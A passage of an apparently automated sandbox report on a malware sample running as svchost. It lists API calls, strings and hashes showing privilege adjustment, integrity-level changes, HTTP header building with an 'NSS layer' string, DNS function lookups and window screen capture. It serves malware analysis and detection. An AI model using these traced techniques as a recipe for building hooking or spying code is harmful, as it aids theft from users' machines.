                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.ADVAPI32(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264EB74
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,0264F9DF,?,?), ref: 0264EBD5
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,0264F9DF,?,?), ref: 0264EC91
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,Content-Length,?,?,?,00000003,0264F9DF,?,?,Host,?,?), ref: 0264EDD3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,0264F9DF,?,?,Host,?,?), ref: 0264EE8E
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,http://,00000007,?,?,Content-Length,?,?,?,00000003,0264F9DF,?,?), ref: 0264EE9F
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,Host,?,?,?,00000000,?,?,?,00000000), ref: 0264EED1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                              • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                              • API String ID: 438689982-3158524741
                                                                                                                                                                                                              • Opcode ID: 1300cc6bb8a3510fad3ee6f713e4e17a82667494add29db6be3169437fc8fc1b
                                                                                                                                                                                                              • Instruction ID: f7626bfa3ade41b922b7f93f32ac2b13799ad1fe94804c2f48320bc61f07e3f8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1300cc6bb8a3510fad3ee6f713e4e17a82667494add29db6be3169437fc8fc1b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED10831E046169BEF258F68C8807FEB7A6BF45314F48469AE8D6A7340DF32D941CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 026592D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265930C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02659338
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265935F
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?), ref: 02659392
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026593AC
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026593B3
                                                                                                                                                                                                              • memset.MSVCRT ref: 026593C3
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 026593CE
                                                                                                                                                                                                              • WSASetLastError.WS2_32(?), ref: 02659414
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorHeapLast$AllocProcessReadmemcpymemset
                                                                                                                                                                                                              • String ID: GET $POST
                                                                                                                                                                                                              • API String ID: 1455188016-2494278042
                                                                                                                                                                                                              • Opcode ID: 9b885a8666145212e0b6e130976717d7bba5c07f5c803e42762dc68be305c05d
                                                                                                                                                                                                              • Instruction ID: 0ea70f55cb29f1db9d20ffcd8f879aeec1f471df87b34b052cd88f4d96066995
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b885a8666145212e0b6e130976717d7bba5c07f5c803e42762dc68be305c05d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34413CB1D01218EFDB10DFA8DC84AAEBBF9EF49704F508529E905E7340E734A9018FA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,0265092A,00000000,?), ref: 0265040B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265040E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0265092A,00000000,?), ref: 0265041B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265041E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000,00000000,?,00000000,?,0265092A,00000000,?), ref: 02650437
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,0265092A,00000000,?), ref: 02650448
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,0265092A,00000000,?), ref: 02650458
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265045B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0265092A,00000000,?), ref: 02650468
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265046B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,?,0265092A,00000000,?), ref: 0265047B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265047E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0265092A,00000000,?), ref: 0265048B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0265092A,00000000,?), ref: 0265048E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$Handle$CloseInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2935687291-0
                                                                                                                                                                                                              • Opcode ID: 03fb244b988da087837fd120a0368b6b678558352c584087929fe8ce46053586
                                                                                                                                                                                                              • Instruction ID: fc854187110538065f1b2effac3dafb18cfbbb153eacc7bba008db8c3e17a4b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03fb244b988da087837fd120a0368b6b678558352c584087929fe8ce46053586
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31317071A42220ABDB209F71AD88B5F7F9CEF88724F558515ED09D7240DB70C490CAA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • EntryPoint.SVCHOST(00000000), ref: 00401BB0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateEntryHandleHeaderImageLockModulePointPointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3282329762-905597979
                                                                                                                                                                                                              • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02646350
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 0264635A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75777390), ref: 0264636A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02646383
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 0264639F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 026463BB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 026463D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                              • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                              • API String ID: 2466897691-3547598143
                                                                                                                                                                                                              • Opcode ID: 62ddb0fbf2b9dab5eb86777530afcf91b8bce17b9f7a8a5c981c2e6d10d31a50
                                                                                                                                                                                                              • Instruction ID: 132705f727ae5375e4f8bfd608641e6748f911209dc0fad33c01702d96abc4a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62ddb0fbf2b9dab5eb86777530afcf91b8bce17b9f7a8a5c981c2e6d10d31a50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88016D717C132532FB2232729D46F5F364D8F42E49B461314B893F1140DF94D91188B9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0264FB54,?), ref: 0264F88F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F892
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264FB54,?), ref: 0264F89B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F89E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,0264FB54,?), ref: 0264F8B1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8B4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0264FB54,?), ref: 0264F8BD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8C0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,0264FB54,?), ref: 0264F8D3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8D6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0264FB54,?), ref: 0264F8DF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8E2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,0264FB54,?), ref: 0264F8F5
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,0264FB54,?), ref: 0264F8F8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0264FB54,?), ref: 0264F901
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,0264FB54,?), ref: 0264F904
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 53f7d69d4c05f498dd04b8fd5852f38c1dd84e4675cdf5ead01802ede5c691c2
                                                                                                                                                                                                              • Instruction ID: 980f6e15c26c6486969961e756872c5a62188625e3aa2b66eb1b6f6b936c37db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53f7d69d4c05f498dd04b8fd5852f38c1dd84e4675cdf5ead01802ede5c691c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26110735A40355BBDB209AB68C8CF0B7E7CEF85B65F25451AB9099B280DE70D440C9B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 0264C96D
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 0264C97C
                                                                                                                                                                                                                • Part of subcall function 0264DCE0: GetClassNameA.USER32(?,?,00000101), ref: 0264DCF6
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0264C9B9
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 0264C9C2
                                                                                                                                                                                                              • PrintWindow.USER32(00000000,?,00000000), ref: 0264C9D5
                                                                                                                                                                                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?), ref: 0264C9FB
                                                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 0264CA11
                                                                                                                                                                                                              • GetWindowRgn.USER32(00000000,00000000), ref: 0264CA1B
                                                                                                                                                                                                              • OffsetRgn.GDI32(00000000,?,?), ref: 0264CA35
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 0264CA40
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0264CA69
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 0264CA72
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0264CA75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3597830993-0
                                                                                                                                                                                                              • Opcode ID: 380876824799f2485b7cc5ade202e280749ea94c234f775783b8cf16015fa0ec
                                                                                                                                                                                                              • Instruction ID: c5a399a5ac4a2ba409800b4556527983fa481e00b58cebbfba69e07a722e4c22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 380876824799f2485b7cc5ade202e280749ea94c234f775783b8cf16015fa0ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B319071A81204BFDB14DB64DC89FBF7BBCEF85710F515609FA42A2280DB70A891CA65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 0266E265
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0266E281
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 0266E29B
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0266E2B1
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0266E2DC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 0266E302
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0266E375
                                                                                                                                                                                                              • free.MSVCRT ref: 0266E40A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %02d/%02d/%04d %02d:%02d, xrefs: 0266E2D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                              • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                              • API String ID: 3846129198-4051342895
                                                                                                                                                                                                              • Opcode ID: a8ca126d0deca41cd5519400b5cc1b37f84ddf875b792fb852dc13467dfb06a2
                                                                                                                                                                                                              • Instruction ID: 80ca9cfdd61339becfc764f58e18770fb0c638de2a14b15d9eb607ef2afe603a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8ca126d0deca41cd5519400b5cc1b37f84ddf875b792fb852dc13467dfb06a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD610575A00609AFCB10CF78DC58AFEBBF5EF49310F044699F946A7241EB32A555CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 0265CBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265CBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265CBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265CBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0265CBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265CBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A689,BSS), ref: 0265CC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265CC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 8A99A689$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-1856957256
                                                                                                                                                                                                              • Opcode ID: 943d24fac2712608406510ab67ee9c13492aa610d0cf45bbe7528117e4469740
                                                                                                                                                                                                              • Instruction ID: 169991c1d654b0076a6d51298cc23041a0aac9294e925776672357f5f9fb5484
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 943d24fac2712608406510ab67ee9c13492aa610d0cf45bbe7528117e4469740
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD01D4309C9B11BBE31167949D59F1E779C5B48A14F810706FD53A22C0DFA0A850CA7B
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2190258309-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D098), ref: 02663B70
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663BB1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02663BBB
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02663BC3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02663BD4
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663BDB
